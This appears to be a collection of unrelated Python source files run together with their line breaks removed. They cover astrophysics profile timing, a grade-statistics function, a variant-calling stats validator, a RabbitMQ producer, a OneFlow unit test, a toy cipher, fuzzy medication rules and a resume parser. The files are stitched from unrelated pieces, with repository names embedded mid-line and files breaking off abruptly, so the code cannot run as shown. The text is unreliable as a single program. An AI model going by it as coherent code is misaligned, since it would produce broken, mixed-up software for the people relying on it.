mass_profile.intensities_from_grid(grid=lens_data.grid_stack.sub) diff = time.time() - start print("EllipticalCoreSersic time = {}".format(diff)) ### SphericalCoreSersic ### mass_profile = 
lp.SphericalCoreSersic(centre=(0.0, 0.0), intensity=1.0, effective_radius=1.0, sersic_index=2.5, radius_break=0.01, intensity_break=0.05, gamma=0.25, alpha=3.0) start = time.time() mass_profile.intensities_from_grid(grid=lens_data.grid_stack.sub) diff = time.time() - start print("SphericalCoreSersic time = {}".format(diff)) print()def notas(* n, sit=False): ''' -> Função para analisar notas e situações de vários alunos. :param n: uma ou mais notas dos alunos (aceita várias) :param sit: valor opcional, indicando se deve ou não adicionar a situação :return: dicionário com várias informações sobre a situação da turma. ''' print('-'*30) tupla = {} maior = menor = soma = 0 tupla['total'] = len(n) for i in n: if maior == 0 or i > maior: maior = i if menor == 0 or i < menor: menor = i soma += i tupla['maior'] = maior tupla['menor'] = menor media = soma / len(n) ''' tupla["maior"] = max(n) tupla["menor"] = min(n) media= sum(n) / len(n) ''' tupla['média'] = media if sit: if media < 4.9: res = 'RUIM' elif media < 6.9: res = 'RAZOAVEL' elif media <= 10: res = 'BOA' tupla['situação'] = res return tupla resp = notas(3.5, 2, 6.5, 2, 7, 4, sit=True) print(resp) #!/usr/bin/env python # Compare som.py stats.csv and hap.py extended.csv files import sys import argparse import csv import pprint as pp import re import logging logging.basicConfig(format='%(asctime)s %(levelname)-8s %(message)s', level=logging.INFO) def parse_args(): parser = argparse.ArgumentParser("Validate hap.py stats") parser.add_argument("--sompy_stats", required=True, help="Path to som.py stats.csv") parser.add_argument("--happy_extended", required=True, help="Path to hap.py extended.csv") args = parser.parse_args() return args def eval_equal(metric_name, count_a, count_b): a = int(count_a) b = int(count_b) e = "PASS" if a == b else "FAIL" logging.info("%s: %d vs %d - %s" % (metric_name, a, b, e)) return e def parse_sompy_stats(path): sompy_stats = csv.DictReader(open(path)) result = dict() for s in sompy_stats: subset = s["type"] if re.match("indels.", subset): # store results per af_bin m = re.findall("indels.(\d+\.\d+)-(\d+\.\d+)", subset)[0] af_low = m[0][:4] af_high = m[1][:4] af_bin = "[%s,%s]" % (af_low, af_high) if af_low == "1.00" else "[%s,%s)" % (af_low, af_high) result["INDEL." + af_bin] = s if re.match("SNVs.", subset): # store results per af_bin m = re.findall("SNVs.(\d+\.\d+)-(\d+\.\d+)", subset)[0] af_low = m[0][:4] af_high = m[1][:4] af_bin = "[%s,%s]" % (af_low, af_high) if af_low == "1.00" else "[%s,%s)" % (af_low, af_high) result["SNP." + af_bin] = s return result if __name__ == '__main__': args = parse_args() sompy_stats = parse_sompy_stats(path=args.sompy_stats) happy_extended = csv.DictReader(open(args.happy_extended)) outcomes = dict(ALL=set(), PASS=set()) for h in happy_extended: k = h["Type"] + "." 
+ h["Subset"] try: s = sompy_stats[k] except KeyError: s = {"total.truth": 0, "tp": 0, "fn": 0, "total.query": 0, "fp": 0, "unk": 0} outcomes[h["Filter"]].add(eval_equal(metric_name="%s %s TRUTH.TOTAL" % (k, h["Filter"]), count_a=s["total.truth"], count_b=h["TRUTH.TOTAL"])) outcomes[h["Filter"]].add(eval_equal(metric_name="%s %s TRUTH.TP" % (k, h["Filter"]), count_a=s["tp"], count_b=h["TRUTH.TP"])) outcomes[h["Filter"]].add(eval_equal(metric_name="%s %s TRUTH.FN" % (k, h["Filter"]), count_a=s["fn"], count_b=h["TRUTH.FN"])) outcomes[h["Filter"]].add(eval_equal(metric_name="%s %s QUERY.TOTAL" % (k, h["Filter"]), count_a=s["total.query"], count_b=h["QUERY.TOTAL"])) outcomes[h["Filter"]].add(eval_equal(metric_name="%s %s QUERY.FP" % (k, h["Filter"]), count_a=s["fp"], count_b=h["QUERY.FP"])) outcomes[h["Filter"]].add(eval_equal(metric_name="%s %s QUERY.UNK" % (k, h["Filter"]), count_a=int(s["unk"])+int(s["ambi"]), count_b=h["QUERY.UNK"])) failed_vfilters = [x for x in outcomes if "FAIL" in outcomes[x]] if len(failed_vfilters) == 2: logging.info("Failed filters: %s" % failed_vfilters) sys.exit(1) else: logging.info("DONE") rabbitmq-cluster/src/x_producer.py #-*-coding=utf-8-*- import sys import socket import time from kombu import Connection, Exchange, Queue, Producer import config def run(rabbit_url): print rabbit_url conn = Connection(rabbit_url) conn.ensure_connection() conn.connect() channel = conn.channel() exchange = Exchange(config.EXCHANGE_NAME, type='direct') producer = Producer(exchange=exchange, channel=channel, routing_key=config.ROUTING_KEY) queue = Queue(name=config.QUEUE_NAME, exchange=exchange, routing_key=config.ROUTING_KEY) queue.maybe_bind(conn) queue.declare() index = 0 while True: try: time.sleep(1) print 'producer' index += 1 producer.publish("send message -- %s" % index) except socket.timeout: pass if __name__ == "__main__": print 'python x_producer "amqp://localhost:5672/;amqp://localhost:5672/"' if len(sys.argv) > 1: rabbit_url = sys.argv[1] else: rabbit_url = config.RABBIT_URL run(rabbit_url) from m5.params import * from m5.SimObject import SimObject class MulticastScoreboard(SimObject): type = 'MulticastScoreboard' cxx_class = 'MulticastScoreboard' cxx_header = "mem/ruby/structures/MulticastScoreboard.hh" 1-10 """ Copyright 2020 The OneFlow Authors. All rights reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. 
""" import unittest import os from collections import OrderedDict import numpy as np import oneflow as flow import test_global_storage from test_util import GenArgList, type_name_to_flow_type def compare_with_not_fused( test_case, device_type, x_shape, data_type, diagonal, fill_value, scale, rate, seed ): assert device_type in ["gpu", "cpu"] flow.clear_default_session() func_config = flow.FunctionConfig() if data_type == "float16": dtype = flow.float else: dtype = type_name_to_flow_type[data_type] @flow.global_function(type="train", function_config=func_config) def test_fused_scale_tril_softmax_dropout_fw_bw_job(): with flow.scope.placement(device_type, "0:0"): x = flow.get_variable( "x", shape=x_shape, dtype=dtype, initializer=flow.random_uniform_initializer(minval=-1.0, maxval=1.0), trainable=True, ) flow.watch(x, test_global_storage.Setter("x")) x1 = flow.identity(x) x2 = flow.identity(x) flow.watch_diff(x1, test_global_storage.Setter("x1_diff")) flow.watch_diff(x2, test_global_storage.Setter("x2_diff")) if data_type == "float16": y1 = flow.cast( flow.nn.dropout( flow.nn.softmax( flow.math.fused_scale_tril( flow.cast(x1, dtype=flow.float16), diagonal=diagonal, fill_value=fill_value, scale=scale, ), ), rate=rate, seed=seed, name="dropout", ), dtype=flow.float, ) y2 = flow.cast( flow.nn.fused_scale_tril_softmax_dropout( flow.cast(x2, dtype=flow.float16), diagonal=diagonal, fill_value=fill_value, scale=scale, rate=rate, seed=seed, ), dtype=flow.float, ) else: y1 = flow.nn.dropout( flow.nn.softmax( flow.math.fused_scale_tril( x1, diagonal=diagonal, fill_value=fill_value, scale=scale ) ), rate=rate, seed=seed, name="dropout", ) y2 = flow.nn.fused_scale_tril_softmax_dropout( x2, diagonal=diagonal, fill_value=fill_value, scale=scale, rate=rate, seed=seed, ) flow.watch(y1, test_global_storage.Setter("y1")) flow.watch(y2, test_global_storage.Setter("y2")) flow.watch_diff(y1, test_global_storage.Setter("y1_diff")) flow.watch_diff(y2, test_global_storage.Setter("y2_diff")) loss = y1 + y2 total_loss = loss * x flow.optimizer.SGD( flow.optimizer.PiecewiseConstantScheduler([], [0.001]), momentum=0 ).minimize(flow.math.reduce_sum(total_loss)) return loss of_out = test_fused_scale_tril_softmax_dropout_fw_bw_job().get() y1 = test_global_storage.Get("y1") y2 = test_global_storage.Get("y2") tol = 1e-3 if data_type == "float16" else 1e-5 test_case.assertTrue(np.allclose(y1, y2, rtol=tol, atol=tol, equal_nan=True)) x1_diff = test_global_storage.Get("x1_diff") x2_diff = test_global_storage.Get("x2_diff") test_case.assertTrue( np.allclose(x1_diff, x2_diff, rtol=tol, atol=tol, equal_nan=True) ) @flow.unittest.skip_unless_1n1d() class TestFusedScaleTrilSoftmaxDropout(flow.unittest.TestCase): @unittest.skipIf(os.getenv("ONEFLOW_TEST_CPU_ONLY"), "only test cpu cases") def test_fused_scale_tril_softmax_dropout(test_case): arg_dict = OrderedDict() arg_dict["device_type"] = ["gpu"] arg_dict["x_shape"] = [ (2, 2, 5, 5), (10, 20), (32, 12, 128), (10, 960), ] arg_dict["data_type"] = ["float16", "float32", "double"] arg_dict["diagonal"] = [-1, 0] arg_dict["fill_value"] = [float("-inf"), 0] arg_dict["scale"] = [0.125] arg_dict["rate"] = [0.5] arg_dict["seed"] = [12345] for arg in GenArgList(arg_dict): if arg[0] == "cpu" and arg[2] == "float16": continue compare_with_not_fused(test_case, *arg) if __name__ == "__main__": unittest.main() karamolegkos/Diastema-Testorchestrator/pb_check.py1-10 # Function to check if a Diastema Playbook is Valid def playbook_check(playbook, diastema_token): """ A set of rules. 
Returns True is Playbook is ok. Or False if there is a problem in the playbook. """ if playbook is None: print("[ERROR] No Diastema playbook given!") return (False, "No Diastema playbook given!") if not ("diastema-token" in playbook): print("[ERROR] No Diastema Token given!") return (False, "No Diastema Token given!") if playbook["diastema-token"] != diastema_token: print("[ERROR] Invalid Diastema Token!") return (False, "Invalid Diastema Token!") # More rules can be added here return (True, "Valid playbook")NosicLin/Faeris0 from LuaCompiler import LuaCompiler keyorder.py #!/usr/bin/env python import sys import re import cryptutils from string import ascii_uppercase import optparse import copy from pi import PiGenerator import math class KeyOrder(object): KEYLENGTH = 20 key = None extras = '., "&?' #extra characters we can use because we need to fill up 5 bits letters = ascii_uppercase+extras rdict = dict(zip(range(0,32),letters)) fdict = dict(zip(letters,range(0,32))) def __init__(self,key): key = cryptutils.convertInput(key,['upper','nospace','charonly']) if len(key) < self.KEYLENGTH: raise ValueError,'Key Length must be %i characters or more.' % (self.KEYLENGTH) self.key = self.orderKey(key[0:self.KEYLENGTH]) def orderKey(self,key): sk = sorted(key) ik = [-1 for x in range(0,len(key))] alreadyseen = ''; for i in range(0,len(key)): ch = key[i] idx = sk.index(ch) ik[i] = idx sk[idx] = '0' return ik def getBitString(self,numbers): bitstring = '' for n in numbers: bitstring = bitstring + str(n % 2) return bitstring def scrambleKey(self,newmessage): nchars = len(newmessage) P = nchars * 5 if P % 20: Q = P / 20.0 P = int(math.ceil(Q)*20) pi = PiGenerator(P) scrambled = [] for i in range(0,P/20): pstart = i*20 pend = pstart + 20 pd = pi.digits[pstart:pend] s = [(pd[i] + self.key[i])%10 for i in range(0,20)] scrambled = scrambled + s for i in range(0,10): scrambled = self.shuffle(scrambled) return self.shuffle(scrambled) def shuffle(self,scrambled): newscramble = [0 for i in scrambled] n = len(newscramble) nchunks = n/10 key1 = [] key2 = [] for k in self.key: if k < 10: key1.append(k) else: key2.append(k-10) for i in range(0,nchunks/2): i1 = i*10 i2 = i1+10 block1 = scrambled[i1:i2] i3 = (nchunks-(i+1))*10 i4 = i3+10 block2 = scrambled[i3:i4] for j in range(0,10): k1 = key1[j] k2 = key2[j] newscramble[i1+j] = block2[k2] newscramble[i3+j] = block1[k1] return newscramble def encrypt(self,message): newmessage = '' ciphertext = '' bitstring = '' for m in message.upper(): if m in self.letters: newmessage = newmessage + m scrambled = self.scrambleKey(newmessage) nchars = len(newmessage) nchunks = int(math.ceil(nchars/20.0)) for ichunk in range(nchunks): #print 'Chunk %i' % ichunk istart = ichunk*20 iend = istart + 20 if iend > len(newmessage)-1: chunk = newmessage[istart:] else: chunk = newmessage[istart:istart+20] for i in range(0,len(chunk)): if len(chunk) < len(self.key): kidx = i else: kidx = self.key[i] ch = chunk[kidx] numch = self.fdict[ch] pstart = ichunk*20 + kidx*5 pend = pstart + 5 piblock = scrambled[pstart:pend] pibits = cryptutils.list2bin(piblock) pinum = cryptutils.bin2dec(pibits) bitstring = bitstring + self.rdict[pinum] numct = numch ^ pinum ciphertext = ciphertext + self.rdict[numct] #print '%2i %2i %2s %2i %4i %4i %-20s %2i %2i %s' % (i,kidx,ch,numch,pstart,pend,str(piblock),pinum,numct,ciphertext[-1]) return (ciphertext,bitstring) def decrypt(self,ciphertext): newciphertext = '' plaintext = [0 for c in ciphertext] bitstring = '' for m in ciphertext.upper(): if m in self.letters: 
newciphertext = newciphertext + m scrambled = self.scrambleKey(newciphertext) nchars = len(newciphertext) nchunks = int(math.ceil(nchars/20.0)) for ichunk in range(nchunks): istart = ichunk*20 chunk = newciphertext[istart:istart+20] for i in range(0,len(chunk)): if len(chunk) < len(self.key): kidx = i else: kidx = self.key[i] ch = chunk[i] numch = self.fdict[ch] pstart = ichunk*20 + kidx*5 pend = pstart + 5 piblock = scrambled[pstart:pend] pibits = cryptutils.list2bin(piblock) pinum = cryptutils.bin2dec(pibits) bitstring = bitstring + self.rdict[pinum] numct = numch ^ pinum plaintext[istart+kidx] = self.rdict[numct] plaintext = ''.join(plaintext) return (plaintext,bitstring) if __name__ == '__main__': usage = 'usage: %prog [options] plain/ciphertext' parser = optparse.OptionParser(usage=usage) parser.add_option("-k", "--key", dest="key", help="set key for encryption/decryption", metavar="KEY") parser.add_option("-e", "--encrypt", dest="doEncrypt", action="store_true",default=False) parser.add_option("-d", "--decrypt", dest="doDecrypt", action="store_true",default=False) parser.add_option("-b", "--genbits", dest="doGenBits", action="store_true",default=False) (options, args) = parser.parse_args() if options.key is None or len(args) == 0: print 'Specify a key with -k and supply a message to encrypt/decrypt.' parser.print_help() sys.exit(1) if options.doEncrypt and options.doDecrypt: print 'You must select one of encryption or decryption.' parser.print_help() sys.exit(1) message = ' '.join(args) try: k = KeyOrder(options.key) except ValueError,msg: print msg parser.print_help() sys.exit(1) if options.doEncrypt: ct,bitstring = k.encrypt(message) print "'%s'" % ct if options.doGenBits: print "'%s'" % bitstring if options.doDecrypt: print k.decrypt(message) if options.doGenBits: ct,bitstring = k.encrypt(message) print "'%s'" % bitstring from FuzzyEngine.rule import Rule from Simulation.environment import Environment from random import random def dipirona_action(time: int, env: Environment) -> list[Rule]: r = random() actions_rules = [] if r < 0.7: if env.get_parameter('temperatura') != None and env.get_parameter('temperatura').value>37: actions_rules.append(Rule( {'temperatura':'media'}, destination='temperatura', then=('decrease','low'))) actions_rules.append(Rule( {'temperatura':'alta'}, destination='temperatura', then=('decrease','medium'))) actions_rules.append(Rule( {'temperatura':'muy alta'}, destination='temperatura', then=('decrease','high'))) return actions_rules def calbamol_action(time: int, env: Environment) -> list[Rule]: r = random() actions_rules = [] if r < 1: if env.get_parameter('temperatura') != None and env.get_parameter('temperatura').value>38: actions_rules.append(Rule( {'temperatura':'baja'}, destination='temperatura', then=('decrease','low'))) actions_rules.append(Rule( {'temperatura':'media'}, destination='temperatura', then=('decrease','low'))) actions_rules.append(Rule( {'temperatura':'alta'}, destination='temperatura', then=('decrease','high'))) actions_rules.append(Rule( {'temperatura':'muy alta'}, destination='temperatura', then=('decrease','high'))) if env.get_parameter('plaqueta') != None and env.get_parameter('plaqueta').value<=10: actions_rules.append(Rule( {'plaqueta':'media'}, destination='plaqueta', then=('increase','low'))) actions_rules.append(Rule( {'plaqueta':'baja'}, destination='plaqueta', then=('increase','medium'))) actions_rules.append(Rule( {'plaqueta':'alta'}, destination='plaqueta', then=('increse','low'))) return actions_rules def 
jarabe_action(time: int, env: Environment) -> list[Rule]: r = random() actions_rules = [] if r < 1: if env.get_parameter('tos') != None and env.get_parameter('tos').value>=15: actions_rules.append(Rule( {'tos':'baja'}, destination='tos', then=('decrease','low'))) actions_rules.append(Rule( {'tos':'media'}, destination='tos', then=('decrease','high'))) actions_rules.append(Rule( {'tos':'alta'}, destination='tos', then=('decrease','high'))) return actions_rules def antibiotico_action(time: int, env: Environment) -> list[Rule]: r = random() actions_rules = [] if r < 1: if env.get_parameter('temperatura') != None and env.get_parameter('temperatura').value>38: actions_rules.append(Rule( {'temperatura':'baja'}, destination='temperatura', then=('decrease','low'))) actions_rules.append(Rule( {'temperatura':'media'}, destination='temperatura', then=('decrease','low'))) actions_rules.append(Rule( {'temperatura':'alta'}, destination='temperatura', then=('decrease','medium'))) actions_rules.append(Rule( {'temperatura':'muy alta'}, destination='temperatura', then=('decrease','high'))) if env.get_parameter('tos') != None and env.get_parameter('tos').value>=22: actions_rules.append(Rule( {'tos':'baja'}, destination='tos', then=('decrease','low'))) actions_rules.append(Rule( {'tos':'media'}, destination='tos', then=('decrease','medium'))) actions_rules.append(Rule( {'tos':'alta'}, destination='tos', then=('decrease','high'))) return actions_rules def plaquetol_action(time: int, env: Environment) -> list[Rule]: r = random() actions_rules = [] if r < 1: actions_rules.append(Rule( {'plaqueta':'media'}, destination='plaqueta', then=('increase','low'))) actions_rules.append(Rule( {'plaqueta':'baja'}, destination='plaqueta', then=('increase','medium'))) actions_rules.append(Rule( {'plaqueta':'alta'}, destination='plaqueta', then=('decrese','low'))) return actions_rulesmeiwanlanjun/knowledge-repoknowledge_repo/app/deploy/__init__.py1-10 import logging from .common import KnowledgeDeployer, get_app_builder # The following subclasses of KnowledgeDeployer must be imported in order to be registered as a deployer and hence # made accessible using `KnowledgeDeployer.using(..)`. from .flask import FlaskDeployer from .uwsgi import uWSGIDeployer # Wrap the gunicorn deployer in a try/except block, as it has a hard dependency on gunicorn which does not work on # non-POSIX systems, or if it is not installed. try: from .gunicorn import GunicornDeployer except: logging.warn("Gunicorn deployer is not available. It only works on POSIX " "platforms (e.g. Linux, Mac OS X, etc. 
If you are using a " "POSIX platform, please ensure that `gunicorn` is installed.") recruiter/parseprofile.py #!/usr/bin/env python import nltk, os, subprocess, code, glob, re, traceback, sys, inspect from time import clock, sleep from pprint import pprint import json import zipfile # import ner from .convertPDFToText import convertPDFToText from .convertDocxToText import convertDocxToText from django.core.files.storage import FileSystemStorage #from convertRtfToText import convertRtfToText class exportToCSV: def __init__(self, fileName='resultsCSV.txt', resetFile=False): headers = ['FILE NAME', 'NAME', 'EMAIL1', 'EMAIL2', 'EMAIL3', 'EMAIL4', 'PHONE1', 'PHONE2', 'PHONE3', 'PHONE4', 'INSTITUTES1','YEARS1', 'INSTITUTES2','YEARS2', 'INSTITUTES3','YEARS3', 'INSTITUTES4','YEARS4', 'INSTITUTES5','YEARS5', 'EXPERIENCE', 'DEGREES', ] if not os.path.isfile(fileName) or resetFile: # Will create/reset the file as per the evaluation of above condition fOut = open(fileName, 'w') fOut.close() fIn = open(fileName) ########### Open file if file already present inString = fIn.read() fIn.close() if len(inString) <= 0: ######### If File already exsists but is empty, it adds the header fOut = open(fileName, 'w') fOut.write(','.join(headers)+'\n') fOut.close() def write(self, infoDict): fOut = open('resultsCSV.txt', 'a+') # Individual elements are dictionaries writeString = '' try: writeString += str(infoDict['fileName']) + ',' writeString += str(infoDict['name']) + ',' if infoDict['email']: writeString += str(','.join(infoDict['email'][:4])) + ',' if len(infoDict['email']) < 4: writeString += ','*(4-len(infoDict['email'])) if infoDict['phone']: writeString += str(','.join(infoDict['phone'][:4])) + ',' if len(infoDict['phone']) < 4: writeString += ','*(4-len(infoDict['phone'])) writeString += str(infoDict['%sinstitute'%'c\\.?a'])+"," writeString +=str(infoDict['%syear'%'c\\.?a'])+"," writeString += str(infoDict['%sinstitute'%'b\\.?com'])+"," writeString +=str(infoDict['%syear'%'b\\.?com'])+"," writeString += str(infoDict['%sinstitute'%'icwa'])+"," writeString +=str(infoDict['%syear'%'icwa'])+"," writeString += str(infoDict['%sinstitute'%'m\\.?com'])+"," writeString +=str(infoDict['%syear'%'m\\.?com'])+"," writeString += str(infoDict['%sinstitute'%'mba'])+"," writeString +=str(infoDict['%syear'%'mba'])+"," writeString += str(infoDict['experience']) + ',' writeString += str(infoDict['degree']) + '\n' # For the remaining elements fOut.write(writeString) except: fOut.write('FAILED_TO_WRITE\n') fOut.close() class Parse(): # List (of dictionaries) that will store all of the values # For processing purposes information=[] inputString = '' tokens = [] lines = [] sentences = [] def __init__(self,filename, verbose=False): print('Starting Programme') fields = ["name", "address", "email", "phone", "mobile", "telephone", "residence status","experience","degree","cainstitute","cayear","caline","b.cominstitute","b.comyear","b.comline","icwainstitue","icwayear","icwaline","m.cominstitute","m.comyear","m.comline","mbainstitute","mbayear","mbaline"] # Glob module matches certain patterns doc_files = glob.glob("resumes/*.doc") docx_files = glob.glob("resumes/*.docx") pdf_files = glob.glob("resumes/*.pdf") rtf_files = glob.glob("resumes/*.rtf") text_files = glob.glob("resumes/*.txt") #files = set(doc_files + docx_files + pdf_files + rtf_files + text_files) #files = list(files) files = list(filename) print("filename ",filename) #print ("%d files identified" %len(files)) #for f in files: #print("Reading File %s"%f) # info is a 
dictionary that stores all the data obtained from parsing info = {} self.inputString, info['extension'] = self.readFile("files/"+filename) print("input",self.inputString) info['fileName'] = filename self.tokenize(self.inputString) self.getEmail(self.inputString, info) self.getPhone(self.inputString, info) self.getName(self.inputString, info) self.Qualification(self.inputString,info) self.getExperience(self.inputString,info,debug=False) #csv=exportToCSV() #csv.write(info) self.information.append(info) print (info) def readFile(self, fileName): ''' Read a file given its name as a string. Modules required: os UNIX packages required: antiword, ps2ascii ''' extension = fileName.split(".")[-1] if extension == "txt": f = open(fileName, 'r') string = f.read() f.close() return string, extension elif extension == "doc": # Run a shell command and store the output as a string # Antiword is used for extracting data out of Word docs. Does not work with docx, pdf etc. return subprocess.Popen(['antiword', fileName], stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()[0], extension elif extension == "docx": try: return convertDocxToText(fileName), extension except: return '' pass #elif extension == "rtf": # try: # return convertRtfToText(fileName), extension # except: # return '' # pass elif extension == "pdf": # ps2ascii converst pdf to ascii text # May have a potential formatting loss for unicode characters # return os.system(("ps2ascii %s") (fileName)) print("from pdf") try: return convertPDFToText(fileName), extension except: return '' pass else: print('Unsupported format') return '', '' def preprocess(self, document): ''' Information Extraction: Preprocess a document with the necessary POS tagging. Returns three lists, one with tokens, one with POS tagged lines, one with POS tagged sentences. Modules required: nltk ''' try: # Try to get rid of special characters try: document = document.decode('ascii', 'ignore') except: document = document.encode('ascii', 'ignore') # Newlines are one element of structure in the data # Helps limit the context and breaks up the data as is intended in resumes - i.e., into points lines = [el.strip() for el in document.split("\n") if len(el) > 0] # Splitting on the basis of newlines lines = [nltk.word_tokenize(el) for el in lines] # Tokenize the individual lines lines = [nltk.pos_tag(el) for el in lines] # Tag them # Below approach is slightly different because it splits sentences not just on the basis of newlines, but also full stops # - (barring abbreviations etc.) 
# But it fails miserably at predicting names, so currently using it only for tokenization of the whole document sentences = nltk.sent_tokenize(document) # Split/Tokenize into sentences (List of strings) sentences = [nltk.word_tokenize(sent) for sent in sentences] # Split/Tokenize sentences into words (List of lists of strings) tokens = sentences sentences = [nltk.pos_tag(sent) for sent in sentences] # Tag the tokens - list of lists of tuples - each tuple is (, ) # Next 4 lines convert tokens from a list of list of strings to a list of strings; basically stitches them together dummy = [] for el in tokens: dummy += el tokens = dummy # tokens - words extracted from the doc, lines - split only based on newlines (may have more than one sentence) # sentences - split on the basis of rules of grammar return tokens, lines, sentences except Exception as e: print(e) def tokenize(self, inputString): try: self.tokens, self.lines, self.sentences = self.preprocess(inputString) return self.tokens, self.lines, self.sentences except Exception as e: print(e) def getEmail(self, inputString, infoDict, debug=False): ''' Given an input string, returns possible matches for emails. Uses regular expression based matching. Needs an input string, a dictionary where values are being stored, and an optional parameter for debugging. Modules required: clock from time, code. ''' email = None try: pattern = re.compile(r'\S*@\S*') matches = pattern.findall(inputString) # Gets all email addresses as a list email = matches except Exception as e: print(e) infoDict['email'] = email if debug: print("\n", pprint(infoDict), "\n") code.interact(local=locals()) return email def getPhone(self, inputString, infoDict, debug=False): ''' Given an input string, returns possible matches for phone numbers. Uses regular expression based matching. Needs an input string, a dictionary where values are being stored, and an optional parameter for debugging. Modules required: clock from time, code. ''' number = None try: pattern = re.compile(r'([+(]?\d+[)\-]?[ \t\r\f\v]*[(]?\d{2,}[()\-]?[ \t\r\f\v]*\d{2,}[()\-]?[ \t\r\f\v]*\d*[ \t\r\f\v]*\d*[ \t\r\f\v]*)') # Understanding the above regex # +91 or (91) -> [+(]? \d+ -? # Metacharacters have to be escaped with \ outside of character classes; inside only hyphen has to be escaped # hyphen has to be escaped inside the character class if you're not incidication a range # General number formats are 123 456 7890 or 12345 67890 or 1234567890 or 123-456-7890, hence 3 or more digits # Amendment to above - some also have (0000) 00 00 00 kind of format # \s* is any whitespace character - careful, use [ \t\r\f\v]* instead since newlines are trouble match = pattern.findall(inputString) # match = [re.sub(r'\s', '', el) for el in match] # Get rid of random whitespaces - helps with getting rid of 6 digits or fewer (e.g. pin codes) strings # substitute the characters we don't want just for the purpose of checking match = [re.sub(r'[,.]', '', el) for el in match if len(re.sub(r'[()\-.,\s+]', '', el))>6] # Taking care of years, eg. 2001-2004 etc. match = [re.sub(r'\D$', '', el).strip() for el in match] # $ matches end of string. This takes care of random trailing non-digit characters. 
\D is non-digit characters match = [el for el in match if len(re.sub(r'\D','',el)) <= 15] # Remove number strings that are greater than 15 digits try: for el in list(match): # Create a copy of the list since you're iterating over it if len(el.split('-')) > 3: continue # Year format YYYY-MM-DD for x in el.split("-"): try: # Error catching is necessary because of possibility of stray non-number characters # if int(re.sub(r'\D', '', x.strip())) in range(1900, 2100): if x.strip()[-4:].isdigit(): if int(x.strip()[-4:]) in range(1900, 2100): # Don't combine the two if statements to avoid a type conversion error match.remove(el) except: pass except: pass number = match except: pass infoDict['phone'] = number if debug: print("\n", pprint(infoDict), "\n") code.interact(local=locals()) return number def getName(self, inputString, infoDict, debug=False): ''' Given an input string, returns possible matches for names. Uses regular expression based matching. Needs an input string, a dictionary where values are being stored, and an optional parameter for debugging. Modules required: clock from time, code. ''' # Reads Indian Names from the file, reduce all to lower case for easy comparision [Name lists] indianNames = open("files/allNames.txt", "r").read().lower() # Lookup in a set is much faster indianNames = set(indianNames.split()) otherNameHits = [] nameHits = [] name = None try: # tokens, lines, sentences = self.preprocess(inputString) tokens, lines, sentences = self.tokens, self.lines, self.sentences # Try a regex chunk parser # grammar = r'NAME: {|}' grammar = r'NAME: {*}' # Noun phrase chunk is made out of two or three tags of type NN. (ie NN, NNP etc.) - typical of a name. {2,3} won't work, hence the syntax # Note the correction to the rule. Change has been made later. 
chunkParser = nltk.RegexpParser(grammar) all_chunked_tokens = [] for tagged_tokens in lines: # Creates a parse tree if len(tagged_tokens) == 0: continue # Prevent it from printing warnings chunked_tokens = chunkParser.parse(tagged_tokens) all_chunked_tokens.append(chunked_tokens) for subtree in chunked_tokens.subtrees(): # or subtree.label() == 'S' include in if condition if required if subtree.label() == 'NAME': for ind, leaf in enumerate(subtree.leaves()): if leaf[0].lower() in indianNames and 'NN' in leaf[1]: # Case insensitive matching, as indianNames have names in lowercase # Take only noun-tagged tokens # Surname is not in the name list, hence if match is achieved add all noun-type tokens # Pick upto 3 noun entities hit = " ".join([el[0] for el in subtree.leaves()[ind:ind+3]]) # Check for the presence of commas, colons, digits - usually markers of non-named entities if re.compile(r'[\d,:]').search(hit): continue nameHits.append(hit) # Need to iterate through rest of the leaves because of possible mis-matches # Going for the first name hit if len(nameHits) > 0: nameHits = [re.sub(r'[^a-zA-Z \-]', '', el).strip() for el in nameHits] name = " ".join([el[0].upper()+el[1:].lower() for el in nameHits[0].split() if len(el)>0]) otherNameHits = nameHits[1:] except Exception as e: print(traceback.format_exc()) print(e) infoDict['name'] = name infoDict['otherNameHits'] = otherNameHits if debug: print("\n", pprint(infoDict), "\n") code.interact(local=locals()) return name, otherNameHits def getExperience(self,inputString,infoDict,debug=False): experience=[] try: for sentence in self.lines:#find the index of the sentence where the degree is find and then analyse that sentence sen=" ".join([words[0].lower() for words in sentence]) #string of words in sentence if re.search('experience',sen): sen_tokenised= nltk.word_tokenize(sen) tagged = nltk.pos_tag(sen_tokenised) entities = nltk.chunk.ne_chunk(tagged) for subtree in entities.subtrees(): for leaf in subtree.leaves(): if leaf[1]=='CD': experience=leaf[0] except Exception as e: print(traceback.format_exc()) print(e) if experience: infoDict['experience'] = experience else: infoDict['experience']=0 if debug: print("\n", pprint(infoDict), "\n") code.interact(local=locals()) return experience def getQualification(self,inputString,infoDict,D1,D2): #key=list(qualification.keys()) qualification={'institute':'','year':''} nameofinstitutes=open('files/nameofinstitutes.txt','r').read().lower()#open file which contains keywords like institutes,university usually fond in institute names nameofinstitues=set(nameofinstitutes.split()) instiregex=r'INSTI: {?+??}' chunkParser = nltk.RegexpParser(instiregex) try: index=[] line=[]#saves all the lines where it finds the word of that education for ind, sentence in enumerate(self.lines):#find the index of the sentence where the degree is find and then analyse that sentence sen=" ".join([words[0].lower() for words in sentence]) #string of words if re.search(D1,sen) or re.search(D2,sen): index.append(ind) #list of all indexes where word Ca lies if index:#only finds for Ca rank and CA year if it finds the word Ca in the document for indextocheck in index:#checks all nearby lines where it founds the degree word.ex-'CA' for i in [indextocheck,indextocheck+1]: #checks the line with the keyword and just the next line to it try: try: wordstr=" ".join(words[0] for words in self.lines[i])#string of that particular line except: wordstr="" #if re.search(r'\D\d{1,3}\D',wordstr.lower()) and qualification['rank']=='': 
